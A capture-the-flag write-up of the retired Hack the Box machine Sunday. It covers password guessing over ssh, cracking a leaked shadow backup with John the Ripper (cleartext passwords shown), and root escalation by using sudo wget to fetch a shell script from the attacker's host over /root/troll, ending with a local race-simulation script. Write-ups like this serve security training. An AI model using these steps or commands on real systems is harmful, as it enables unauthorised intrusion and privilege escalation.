Next up in my series of guides to retired Hack the Box machines is my writeup of Sunday. This is listed as a 20 point box, so it should be quite simple; however, there were a couple of trolling moments in the course of exploiting it.
So let's start, as always, with our nmap scan. It can take quite a while on this box, so be patient, go and make a cup of tea or grab something stronger.
$ nmap -sC -sV -p- -oA nmap/scan 10.10.10.76
We can see a few interesting ports open here; firstly the finger service port, which nmap has helpfully already run a script against to enumerate some users. Here we can see that a user called sunny is logged in. We can also see that ssh is available, albeit on port 22022 rather than the usual 22.
As we have a username and an ssh service, the first thing we try is a few guesses at basic passwords, and bang, sunday gets us in!
$ ssh -p 22022 sunny@10.10.10.76
So now we have a shell, let's see if we have a user flag in the usual place, the Desktop folder ... and unfortunately it would seem that this is not the user we need. Time to enumerate further.
In the /etc/passwd file we can see another user account called sammy:
$ cat /etc/passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
...
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
That looks like a good candidate for us to aim for. Running sudo -l shows us a binary that we can run as root without a password, aptly named /root/troll. Running that file simply prints out testing and the output of another command.
With that dead end, we carry on enumerating the box, and in our investigations we come across a backup folder which contains a world-readable copy of the shadow file.
$ cd /backup
$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Only sammy and sunny have real password hashes (the $5$ prefix is sha256crypt); the other accounts are locked (*LK*) or have no password (NP). So with both this shadow backup and the standard passwd file, we make local copies of them and start up John the Ripper. The format warning can be ignored: sha256crypt is the native, faster format, and john picks it by default.
$ unshadow passwd shadow > passwords.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Warning: detected hash type "sha256crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Remaining 1 password hash
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:02:32 DONE (2018-05-09 20:21) 0.006559g/s 1336p/s 1336c/s 1336C/s coolster..chs2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ john --show passwords.txt
sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash
sunny:sunday:65535:1:sunny:/export/home/sunny:/bin/bash
2 password hashes cracked, 0 left
We have sammy's password (the "Remaining 1 password hash" line is john telling us sunny's hash was already in its pot file), so now we can ssh in as sammy, and finally we have access to the user flag!
Yet More Enumeration
As we are now logged in as a new user account, we start our enumeration again. Checking sudo -l again shows us that this user is able to run the wget command as root without a password. Since wget's -O option writes the download to any path we choose, and it runs as root, that means sammy can overwrite /root/troll, which sunny can then execute as root via sudo. So maybe we can chain this together with the binary from the previous user account and get root.
First thing we do is create a very small shell script, su.sh, that gives us a root shell when run as root. Then we serve it from our attacking machine with a simple HTTP server using python on port 8000, and in our sammy ssh session we run the following:
$ sudo wget http://10.10.14.15:8000/su.sh -O /root/troll
Everything downloads fine, but by the time we have swapped over to our sunny ssh session, the troll binary seems not to have been overwritten and just prints the same output as before. Hmm, this binary is definitely well named.
Looking at the processes running on this machine (ps -ef) we spot a script running from the root directory called overwrite, so we can surmise that any changes to the troll binary get overwritten within a short time frame. We should still have a small window, however.
So we set up concurrent ssh sessions, one logged in as each of the users we have passwords for. Then we wget our script in sammy's window, quickly switch over to sunny's window and run sudo /root/troll before the overwrite script restores it.
And there we have root, and access to the final flag!
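To make the race against the overwrite script easier to reason about, here is an added example of my own (not code from the original writeup, and not the su.sh used on the box) that simulates it locally as an unprivileged shell script. A temporary directory stands in for /root, a background loop stands in for the root-owned overwrite script, a plain cp stands in for sudo wget -O /root/troll, and the payload only announces itself rather than spawning a root shell. The 2-second restore interval, the retry budget and all the paths are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup: a local, unprivileged
# simulation of the /root/troll overwrite race.
#   - $WORK/troll stands in for /root/troll
#   - start_overwriter stands in for the root "overwrite" script
#   - drop_payload stands in for "sudo wget http://... -O /root/troll"
#   - win_race stands in for sunny running "sudo /root/troll"
# The restore interval (2s), retry budget and paths are assumptions.

WORK=$(mktemp -d)
TROLL="$WORK/troll"        # stand-in for /root/troll
ORIG="$WORK/troll.orig"    # pristine copy the overwriter restores from
OVERWRITER_PID=""
trap 'rm -rf "$WORK"' EXIT

# The "real" troll: just prints testing, as on the box.
printf '#!/bin/sh\necho testing\n' > "$ORIG"
chmod 755 "$ORIG"
cp "$ORIG" "$TROLL"

# Stand-in for the root overwrite script: put the original troll back
# every 2 seconds. Output is discarded so the loop holds no pipes open.
start_overwriter() {
    (
        while :; do
            cp "$ORIG" "$TROLL"
            sleep 2
        done
    ) >/dev/null 2>&1 &
    OVERWRITER_PID=$!
}

# sammy's side: drop our payload over troll. On the box this is the
# sudo wget -O step; the payload would be whatever gives a root shell.
drop_payload() {
    printf '#!/bin/sh\necho payload-ran\n' > "$TROLL"
    chmod 755 "$TROLL"
}

# sunny's side: run troll straight after the drop and retry until the
# payload output appears or the attempt budget is spent. Prints the last
# output seen; returns 0 if the race was won, 1 otherwise.
win_race() {
    attempts=${1:-5}
    i=0
    out=""
    while [ "$i" -lt "$attempts" ]; do
        drop_payload
        # exec can fail (ETXTBSY) or read a half-restored file while the
        # overwriter is mid-copy; treat that as a lost attempt and retry.
        out=$("$TROLL" 2>/dev/null) || true
        if [ "$out" = "payload-ran" ]; then
            echo "$out"
            return 0
        fi
        i=$((i + 1))
        sleep 1
    done
    echo "$out"
    return 1
}

# Demonstration when run as a script: start the overwriter, race it, stop it.
start_overwriter
if win_race 5; then
    echo "won the race"
else
    echo "lost the race"
fi
kill "$OVERWRITER_PID"
```

On the real box, the two functions map onto the two ssh sessions: sammy's loop body is sudo wget ... -O /root/troll, sunny's is sudo /root/troll, and the check for "payload-ran" becomes whatever your payload does (for a root shell you simply get the prompt). The point the simulation makes is that a periodic restore is a window, not a wall: as long as the write and the execute happen closer together than the restore interval, a retry loop wins it reliably, which is much less fiddly than switching windows by hand.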